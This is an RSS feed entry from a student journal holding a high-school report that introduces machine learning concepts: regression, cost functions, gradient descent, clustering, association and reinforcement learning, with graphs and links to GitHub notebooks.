<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>data science Archives - Exploratio Journal</title>
	<atom:link href="https://exploratiojournal.com/tag/data-science/feed/" rel="self" type="application/rss+xml" />
	<link>https://exploratiojournal.com/tag/data-science/</link>
	<description>Student-edited Academic Publication</description>
	<lastBuildDate>Wed, 04 May 2022 14:45:51 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://exploratiojournal.com/wp-content/uploads/2020/07/cropped-Exploratio_icon-1-32x32.png</url>
	<title>data science Archives - Exploratio Journal</title>
	<link>https://exploratiojournal.com/tag/data-science/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>The Theory and Implementation of Common Machine Learning Algorithms</title>
		<link>https://exploratiojournal.com/the-theory-and-implementation-of-common-machine-learning-algorithms/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=the-theory-and-implementation-of-common-machine-learning-algorithms</link>
		
		<dc:creator><![CDATA[Amanbir Behniwal]]></dc:creator>
		<pubDate>Mon, 02 May 2022 14:53:58 +0000</pubDate>
				<category><![CDATA[Engineering]]></category>
		<category><![CDATA[Mathematics]]></category>
		<category><![CDATA[algorithms]]></category>
		<category><![CDATA[data science]]></category>
		<category><![CDATA[machine learning]]></category>
		<guid isPermaLink="false">https://www.exploratiojournal.com/?p=1815</guid>

					<description><![CDATA[<p>Amanbir Behniwal<br />
Vincent Massey Secondary School</p>
<p>The post <a href="https://exploratiojournal.com/the-theory-and-implementation-of-common-machine-learning-algorithms/">The Theory and Implementation of Common Machine Learning Algorithms</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author: Amanbir Behniwal</strong><br><strong>Mentor</strong>: Dr. Gino Del Ferraro<br><em>Vincent Massey Secondary School</em></p>
</div></div>



<p> </p>



<h2 class="wp-block-heading">1. Introduction</h2>



<p>Machine Learning jobs are growing to become one of the most in de- mand jobs in the world. In the 1940’s, the idea of machine learning first started to grow; it was something that would emulate human think- ing and learning. Machine Learning has since grown to become a big part of our daily lives. For example, in speech recognition software, the software will map the different tones and nuances when someone speaks and try to match this to a specific person. Another example is a translator, which tries to understand the accents of people speaking a language and then translates it to another language. Many applications that we use today, such as Alexa, Siri, and Google Translate, use these machine learning algorithms. Furthermore, we are trying to integrate machine learning into our vehicles. Cars like the Tesla use unsupervised learning algorithms to self-drive in traffic and detect any danger. The future holds many possibilities due to machine learning.</p>



<p>In theory, we input great amounts of data into machine-learning programs, which using statistics, will categorize or predict outcomes by finding and applying patterns in the data. We can further categorize the different types of algorithms used in Machine Learning to supervised, unsupervised learning and reinforcement learning. Supervised learning consists of regression and classification while unsupervised learning consists of clustering and association.</p>



<p>In this report, we will first discuss important terminology needed to understand the contents of the report. We will then begin to dis- cuss the theory behind some of the machine learning algorithms. The algorithms implemented in this report are all regression algorithms, however, we will also discuss the theory behind other algorithms. Finally, we will see how to implement the code. There are GitHub links provided with the actual code.</p>



<h2 class="wp-block-heading">2. Terminology</h2>



<p>Before we can get started with all the theory, we must develop an understanding of some key terminology that we will use quite often when working with machine learning programs. These are some basic terms that we should be familiar with:</p>



<h4 class="wp-block-heading">2.1 Features</h4>



<p>&nbsp; When we are trying to extrapolate from data using a linear model such as a line of best fit, we want the line to have an equation that best fits the data. In general a line has an equation of <em>h </em>= <em>θ</em><sub>0</sub> + <em>θ</em><sub>1</sub><em>x</em><sub>1</sub> + <em>θ</em><sub>2</sub><em>x</em><sub>2</sub> <em>θ<sub>n</sub>x<sub>n</sub></em>. Here we consider <em>x</em><sub>1</sub>, <em>x</em><sub>2</sub>, , <em>x<sub>n</sub></em><sub>1</sub>, <em>x<sub>n</sub></em>the features. We will go more in depth about this later on in the report.</p>



<h4 class="wp-block-heading"><strong>2.2 Inputs</strong></h4>



<p>When we run a python program, we must somehow store the data so that our program knows what we want it to work with. We then take ’input’ of the data in a convenient way for us to work with it. For example, lets say we had a document that contained a few coordinates. We may want our program to take input of this data where the x- coordinates and y-coordinates are stored separately. The program written to complete this process is called ’taking input’. This process is explained in greater deal in the code.</p>



<h4 class="wp-block-heading">2.3 <strong>Outputs</strong></h4>



<p>After our code has calculated what we wanted it to, we want to see this information in an organized manner so that we can study it. We then make our program ’output’ this information. Outputs can consist of words, integers, etc.</p>



<h4 class="wp-block-heading">2.4 <strong>Predicted Values</strong></h4>



<p>Let us say that we received input of many coordinates and we wanted our program to calculate the line of best fit. When we are testing different equations to see if they best fit the data, we input the same x-coordinates as the ones in our input data. However, our y-coordinates may not always be the exact same as that of the input data. We thus call our y-coordinates predicted values, since they are what our program predicted the coordinate lies at based on the equation that we came up with.</p>



<h4 class="wp-block-heading"><strong>2.5 Expected Values</strong></h4>



<p>The values that we get from the inputted data are our expected values since they are the original values that we are comparing the predicted values to.</p>



<h2 class="wp-block-heading">3. <strong>Supervised Learning</strong></h2>



<p>Supervised learning is the most commonly used algorithm in Machine Learning and it is also the simplest to implement. When using super- vised learning, we must train the algorithm by pairing labelled inputs with outputs. The program in this stage is trained to look for patterns that correlate the input to the output. When we have provided the algorithm with a good amount of example pairings, the algorithm will be able to apply this to new inputs it receives. We can further split supervised learning into classification and regression.</p>



<h4 class="wp-block-heading">3.1 <strong>Classification</strong></h4>



<p>Classification is a type of supervised learning. In classification, our output will always be a category that the algorithm has mapped the input to. An example of this would be our program receiving input of pictures of animals and then outputting what animal they are (their category). We first have to train the program by inputting many pictures of dogs and cats in their respective categories so that the program will be able to establish patterns between the images of the dogs and the images of the cats. After we have inputted a sufficient number of images, the program will get accurate in determining if an animal is a cat or dog when it receives an input that it has not seen before.</p>



<h4 class="wp-block-heading">3.2 Regression</h4>



<p>Regression is another type of supervised learning. In regression, our output is not a category but rather a value such as money or age. We can take for example the price of houses and the total square footage of the house. Using regression, we identify the function that best fits between these values where we have reduced the amount of error as much as we can. We can then use the equation of this line to predict how much a house with a certain square footage will cost.</p>



<figure class="wp-block-image size-full is-resized"><img fetchpriority="high" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-1.png" alt="" class="wp-image-1846" width="416" height="183" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-1.png 792w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-1-300x132.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-1-768x337.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-1-230x101.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-1-350x154.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-1-480x211.png 480w" sizes="(max-width: 416px) 100vw, 416px" /><figcaption><br>Figure 1: https://medium.com/machine-learning-in-practice/a-gentle-introduction-to-machine-learning-concepts-cfe710910eb</figcaption></figure>



<h5 class="wp-block-heading">3.2.1 Linear Regression</h5>



<p>When performing linear regression, the program will take input of data and plot it on a graph. It will then find a line of best fit and be able to make predictions based on this line of best fit. For example, we can graph the number of hours a student watches TV rather than studying compared to their test scores.</p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-2.png" alt="" class="wp-image-1847" width="274" height="267" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-2.png 542w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-2-300x292.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-2-230x224.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-2-350x341.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-2-480x468.png 480w" sizes="(max-width: 274px) 100vw, 274px" /><figcaption><br>Figure 2: onlinemath4all.com/scatter-plots-and-trend-lines.html</figcaption></figure>



<p>As we can see, the graph looks fairly linear and it only has one feature; the amount of time spent watching TV rather than studying. This makes it a perfect model for linear regression. We want our program to come up with an approximate equation with which we can estimate a students’ test score based on how long they spent watching TV instead of studying. Really, we are looking for our program to find the line of best fit, since this line would be best for extrapolating the data and providing an as accurate as possible estimate of a test score based on the number of hours that were spent watching TV. Our program would then test many different lines until it reaches one line that fits the data better than any other line.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-3.png" alt="" class="wp-image-1848" width="365" height="345" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-3.png 542w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-3-300x283.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-3-230x217.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-3-350x331.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-3-480x453.png 480w" sizes="(max-width: 365px) 100vw, 365px" /><figcaption>Figure 3: onlinemath4all.com/scatter-plots-and-trend-lines.html</figcaption></figure>



<p>As we can deduce, when calculating the equation of the line of best fit, our slope and y-intercept variables matter a lot. In fact, we are just making changes to these variables to try to find the line of best fit. Machine learning algorithms rely on these parameters (y-intercept, slope/bias, etc.) to run. When we want to find the best model for our data, we need to keep adjusting these parameters so that the direction of our line better fits the data and our predicted values are closer to the expected values. We must then introduce a function that changes these parameters by determining the amount of error that we are getting with the current parameters. This function is called the cost function.</p>



<h2 class="wp-block-heading">4. <strong>Cost Function</strong></h2>



<p>The cost function essentially helps our program minimize the error it produces compared to the actual data set. When we are doing linear regression, it is very rare that we will get a data-set where the data fits precisely on a line. Therefore, when we are computing the line of best fit, we want to find a line such that it has the least possible difference (error) between the actual coordinates and the coordinates our line gives (predicted values). There are multiple ways of defining the cost function, some examples are explained further in the following sections.</p>



<h4 class="wp-block-heading">4.1 <strong>Mean Absolute Error</strong></h4>



<p>When we take the mean absolute error, we are taking the absolute value of the difference between the predicted y-value and the expected y- value. The reasoning for this is that, since we are adding up all the error for each data point, we want to keep track of how much error we are accumulating.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-4.png" alt="" class="wp-image-1850" width="509" height="280" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-4.png 784w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-4-300x165.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-4-768x423.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-4-230x127.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-4-350x193.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-4-480x264.png 480w" sizes="(max-width: 509px) 100vw, 509px" /><figcaption>Figure 4: https://gist.github.com/FisherKK/86f400f6d88facbf5375286db7029ca2</figcaption></figure>



<p>In this graph, the blue points are the original points of the data set, while the orange points are the ‘predicted’ points that our program is currently testing for the line of best fit. As we can see, each <em>d<sub>i</sub></em>represents the amount of ‘error’ our model/line produces for each point in the data set.</p>



<p>However, if we add negative numbers (our predicted point is below the original point), our program actually thinks it’s producing less error. To deal with this we take the absolute value, which is always non-negative, so that our program does not add negative error. Then our program can plug this into the formula which is defined as</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image.png" alt="" class="wp-image-1875" width="288" height="67" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image.png 468w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-300x69.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-230x53.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-350x81.png 350w" sizes="(max-width: 288px) 100vw, 288px" /></figure>



<p>Where <em>m</em>is the number of training examples, <em>y</em>ˆ(<em>i</em>) is the predicted value, <em>y</em>(<em>i</em>) is the expected value and <em>i </em>is the index of the data point since we want to sum the error of all the data points.</p>



<h4 class="wp-block-heading">4.2 <strong>Mean Squared Error</strong></h4>



<p>When we take the mean squared error, instead of taking the absolute value of the difference between the predicted and expected value, we take their square. In this way, we still don’t add up negative error since any real number squared is non-negative. The equation is defined as:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-1.png" alt="" class="wp-image-1877" width="283" height="64" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-1.png 448w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-1-300x68.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-1-230x52.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-1-350x80.png 350w" sizes="(max-width: 283px) 100vw, 283px" /></figure>



<p>When using mean absolute error, we took the absolute value of the distance between the predicted value and the expected value. We are now taking the square of the area of the square whose side length is the distance between the predicted value and the expected value. All these regions are summed and averaged.</p>



<p>Now that we have discussed how our program will calculate the error that our model/line is producing, we must find a way to minimize the value our cost function is returning. The gradient descent algorithm is one of the most effective ways of doing so.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-6.png" alt="" class="wp-image-1854" width="395" height="356" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-6.png 568w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-6-300x270.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-6-230x207.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-6-350x315.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-6-480x433.png 480w" sizes="(max-width: 395px) 100vw, 395px" /><figcaption><br>Figure 5: https://gist.github.com/FisherKK/86f400f6d88facbf5375286db7029ca2</figcaption></figure>



<p>For linear regression models, we assume that our data has a linear dependence and therefore can be modelled by using a linear equation as follows;</p>



<p><em>h</em><em><sub>θ</sub></em>(<em>x</em>) = <em>θ</em><em><sup>T</sup></em><em>x</em>= <em>θ</em><sub>0</sub> + <em>θ</em><sub>1</sub><em>x</em>,</p>



<p>where <em>θ</em><sub>0</sub> is our bias (y-intercept) and <em>θ</em><sub>1</sub> is our slope. Then, we want to change our parameters <em>θ</em><sub>0</sub> and <em>θ</em><sub>1</sub> in such a way that our line better fits the data and the cost function produces less error. In batch gradient descent, we update our theta values continuously with the following equation;</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/05/image-2.png" alt="" class="wp-image-1878" width="282" height="58" srcset="https://exploratiojournal.com/wp-content/uploads/2022/05/image-2.png 500w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-2-300x61.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-2-230x47.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-2-350x71.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/05/image-2-480x98.png 480w" sizes="(max-width: 282px) 100vw, 282px" /></figure>



<p>Here, <em>θ<sub>j</sub></em>is the value that we are updating. Again, <em>m</em>is the size of the data (how many points there are). Alpha here represents the learning rate of our algorithm. If alpha is too big, our program may be a lot faster, but it will not be nearly as accurate in determining the equation of a line of best fit as a smaller value of alpha may be. However, when we use too small a value for alpha, our program will be incredibly slow. It is best to find a good median between these two values.</p>



<h2 class="wp-block-heading">6. <strong>Multi-Linear Regression</strong></h2>



<p>&nbsp;Now that we have discussed how to optimize our program so that it can calculate the best line of fit with equation <em>h </em>= <em>θ</em><sub>0</sub> + <em>θ</em><sub>1</sub> <em>x</em><sub>1</sub>, we think of what we would do when we have multiple features. Currently we have only been working with one feature, which in the example presented, was the number of hours spent watching TV rather than studying. Let’s take another example of the price of a house. When determining the price of a house, we must determine its area, how many rooms it has, how old it is, among other things. In this instance our data when plotted still looks linear however we cannot use the exact same technique as linear regression, since we have more than one feature. We use multi-linear regression in this situation because of its suitability to deal with more than one feature.</p>



<p>Multi-linear regression can be used with as many features as we’d like. Our equation is now</p>



<p><em>h</em>= <em>θ</em><sub>0</sub> + <em>θ</em><sub>1</sub> <em>·</em><em>x</em><sub>1</sub> + <em>θ</em><sub>2</sub> <em>·</em><em>x</em><sub>2</sub> + <em>·</em><em>·</em><em>·</em>+ <em>θ</em><em><sub>n</sub></em><em>·</em><em>x</em><em><sub>n</sub></em>,</p>



<p>where all <em>x</em><em><sub>i</sub></em>represent the different features. When we now implement gradient descent, we must use it to update all <em>θ</em><em><sub>i</sub></em>so that our line better fits the data. The cost function can be implemented in much the same way.</p>



<p>The interesting thing to note about multi linear regression is that we need an n-D graph to plot all the points, however, if we take a 3-D graph for example, our program is essentially finding the line of best fit in a plane that best suits all the points.</p>



<figure class="wp-block-image size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-7-1024x312.png" alt="" class="wp-image-1858" width="536" height="162" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-7-1024x312.png 1024w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-7-300x91.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-7-768x234.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-7-920x280.png 920w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-7-230x70.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-7-350x107.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-7-480x146.png 480w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-7.png 1208w" sizes="(max-width: 536px) 100vw, 536px" /><figcaption>&nbsp; &nbsp; &nbsp; Figure 6: https://aegis4048.github.io/mutiple linear regression and visualization in python</figcaption></figure>



<h2 class="wp-block-heading">7. <strong>Unsupervised Learning</strong></h2>



<p>Unlike supervised learning, in unsupervised learning, we do not train the program with inputs and corresponding outputs. Rather, the pro- gram uses its built-in algorithms to try to find patterns in the unlabelled data and produce an output. For example, if we give input of shapes with different sizes, the algorithm can separate these based on how many sides there are in each shape. In general, unsupervised learning requires much less data then supervised learning. We can further split unsupervised learning into clustering and grouping.</p>



<h4 class="wp-block-heading">7.1 <strong>Clustering</strong></h4>



<p>As discussed earlier, in unsupervised learning, we input unlabelled data into our program. Graphing our data, it may look like the following:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-8.png" alt="" class="wp-image-1859" width="440" height="368" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-8.png 784w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-8-300x251.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-8-768x643.png 768w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-8-230x192.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-8-350x293.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-8-480x402.png 480w" sizes="(max-width: 440px) 100vw, 440px" /><figcaption><br>Figure 7:  <a href="http://www.analyticsvidhya.com/blog/2021/04/k-means-clustering-simplified-in-python/">https://www</a>.anal<a href="http://www.analyticsvidhya.com/blog/2021/04/k-means-clustering-simplified-in-python/">yticsvidh</a>y<a href="http://www.analyticsvidhya.com/blog/2021/04/k-means-clustering-simplified-in-python/">a.com/blog/2021/04/k-means-clustering-simplified-in-p</a>yt<a href="http://www.analyticsvidhya.com/blog/2021/04/k-means-clustering-simplified-in-python/">hon/</a></figcaption></figure>



<p>Once our program has graphed the data, we want our program to try to find patterns in the data. Specifically, clustering algorithms will try to look for clusters of points that seem to be together. The graph could then be divided into the following clusters:</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="688" height="608" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-9.png" alt="" class="wp-image-1860" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-9.png 688w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-9-300x265.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-9-230x203.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-9-350x309.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-9-480x424.png 480w" sizes="(max-width: 688px) 100vw, 688px" /><figcaption>Figure 8: &nbsp; https://www.analyticsvidhya.com/blog/2021/04/k-means-clustering-simplified-in-python/</figcaption></figure>



<p>Among the many applications of clustering, we can use the example of social networks. We may want to find which people seem to be very close friends on their social networks so our algorithm would make clusters of people that appear to be close friends.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-10.png" alt="" class="wp-image-1861" width="307" height="171" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-10.png 456w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-10-300x167.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-10-230x128.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-10-350x195.png 350w" sizes="(max-width: 307px) 100vw, 307px" /><figcaption>Figure 9: https://www<a href="http://www.mghassany.com/MLcourse/introduction.html">.</a>mghassany.com/MLcourse/introduction.html</figcaption></figure>



<p>A more common example in our daily lives would be our spam filter. Our email uses clustering algorithms to try to group spam emails, update emails, advertisement emails, etc. together.</p>



<p>Furthermore, we can classify clustering as hard clustering and soft clustering. In hard clustering, a data point can either belong in a cluster or not. This type of clustering is useful in binary situations such as whether a movie is good or not. On the contrary, when using soft clustering, a data point can belong to many clusters. This is more useful when we may want to determine which books are similar.</p>



<h4 class="wp-block-heading">7.2 <strong>Association</strong></h4>



<p>Association algorithms try to see if two items depend on each other. For example, if we take a customer at a supermarket. If this customer has gone to buy bread, then it is very probable that the customer is also looking to buy butter or milk. In this way, we can associate different items based off of their dependency on each other. Many companies use this technique to place associated items away from each other in a store so that the customer see’s many other items on the way and may consider buying additional things. An example of the different associations in a store are given below:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-11.png" alt="" class="wp-image-1862" width="445" height="402" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-11.png 752w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-11-300x271.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-11-230x208.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-11-350x316.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-11-480x434.png 480w" sizes="(max-width: 445px) 100vw, 445px" /><figcaption><br>Figure 10: https://annalyzin.files.wordpress.com/2016/04/association-rules-network-graph2.png</figcaption></figure>



<h2 class="wp-block-heading"> 8 <strong>Reinforcement Learning</strong></h2>



<p>In reinforcement learning, the program learns what to do by trial and error in its current environment. We can think of it as the program receiving a reward if it does something correct and a penalty if it does something incorrect. Take the analogy of a child, when a child is young, they do not know what is good or bad. The only way the child can learn is by trying new things. The child may touch something electric, get a shock, then instinctively not go near the thing again. The child now knows that that object is something that shouldn’t be touched because it will hurt. A reinforcement learning program works in a similar way. The difference here is that the machine can try thousands of operations in one second and even though it may start by making very bad decisions, it will learn over time and will become a lot more sophisticated in its decision. We can simulate giving a program a reward or penalty by giving it a score in which, if it does something incorrect, the score will lower, and conversely, if it does something correct, the score will increase. This type of program is based entirely on trial and error on the programs part, it is also one of the closest things to a machine’s own creativity.</p>



<p>One of the most useful implementations of reinforcement learning are simulations. For example, the program can be used to help create the optimal rocket engine for a rocket launch. If we put our in a rocket launch environment in which the environment responds to the actions of our program, we can ‘reward’ the program if it’s helping the rocket launch with its actions or ‘punish’ the program if it’s not helping the rocket launch.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-12.png" alt="" class="wp-image-1863" width="402" height="291" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-12.png 598w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-12-300x217.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-12-550x400.png 550w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-12-230x167.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-12-350x253.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-12-480x348.png 480w" sizes="(max-width: 402px) 100vw, 402px" /><figcaption><br>Figure &nbsp;11: &nbsp; https://riptutorial.com/machine-learning/example/32668/reinforcement-learning</figcaption></figure>



<h2 class="wp-block-heading">9. <strong>Linear Regression Implementation</strong></h2>



<p>For the linear regression code, we took input of the population of a city in 10, 000<em>s </em>and its profit in $10, 000. We then plotted all of the coordinates and got the resulting graph:</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-13.png" alt="" class="wp-image-1864" width="352" height="236" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-13.png 752w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-13-300x201.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-13-230x154.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-13-350x235.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-13-480x322.png 480w" sizes="(max-width: 352px) 100vw, 352px" /></figure>



<p>As we can see the graph looks fairly linear, thus we can use linear regression on this.</p>



<p>The full code can be found at: <a href="https://github.com/ABehniwal/face-recognition/blob/main/Numpy-Linear-Regression.ipynb">https://github.com/ABehniwal/face-</a>recognition/ <a href="https://github.com/ABehniwal/face-recognition/blob/main/Numpy-Linear-Regression.ipynb">blob/main/Numpy-Linear-Regression.ipynb</a></p>



<h2 class="wp-block-heading">10. <strong>Multi-Linear Regression Implementation</strong></h2>



<p>For the multi-linear regression code, we took input of the different features of a car (Engine Size, Cylinders, Fuel Consumption (City), Fuel Consumption (Comb)) and the resulting CO2 emission. We then plotted all of these features of the car separately with the CO2 Emissions to get a visual of how the different graphs look. This resulted in the following graphs.</p>



<h4 class="wp-block-heading"><strong>10.1 Engine Size Graph</strong></h4>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-14.png" alt="" class="wp-image-1865" width="445" height="300" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-14.png 760w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-14-300x202.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-14-230x155.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-14-350x236.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-14-480x323.png 480w" sizes="(max-width: 445px) 100vw, 445px" /></figure>



<h4 class="wp-block-heading">10.2 <strong>Cylinders Graph</strong></h4>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-15.png" alt="" class="wp-image-1866" width="443" height="293" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-15.png 760w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-15-300x199.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-15-230x153.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-15-350x232.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-15-480x318.png 480w" sizes="(max-width: 443px) 100vw, 443px" /></figure>



<h4 class="wp-block-heading"><strong>10.3 Fuel Consumption (City) Graph</strong></h4>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2022/04/image-16.png" alt="" class="wp-image-1867" width="451" height="304" srcset="https://exploratiojournal.com/wp-content/uploads/2022/04/image-16.png 760w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-16-300x202.png 300w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-16-230x155.png 230w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-16-350x236.png 350w, https://exploratiojournal.com/wp-content/uploads/2022/04/image-16-480x323.png 480w" sizes="(max-width: 451px) 100vw, 451px" /></figure>



<h4 class="wp-block-heading">10.4 <strong>Fuel Consumption (Comb) Graph</strong></h4>



